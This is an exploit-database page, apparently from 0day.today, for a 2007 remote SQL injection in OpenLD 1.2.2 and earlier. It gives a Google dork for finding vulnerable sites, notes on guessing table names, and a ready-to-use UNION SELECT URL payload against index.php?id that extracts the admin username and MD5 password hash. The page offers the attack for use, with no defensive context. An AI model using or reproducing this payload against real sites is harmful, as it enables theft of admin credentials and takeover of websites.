[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenLD <= 1.2.2 (index.php id) Remote SQL Injection Vulnerability

Author
CypherXero
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2016
Category
web applications
Date add
09-07-2007
Platform
unsorted
=================================================================
OpenLD <= 1.2.2 (index.php id) Remote SQL Injection Vulnerability
=================================================================




--==+================================================================================+==--
--==+                       OpenLD  <= 1.2.2 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

NOTES:

The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.

DORK:

"Powered by OpenLD"

EXPLOITS:

http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--



#  0day.today [2024-11-15]  #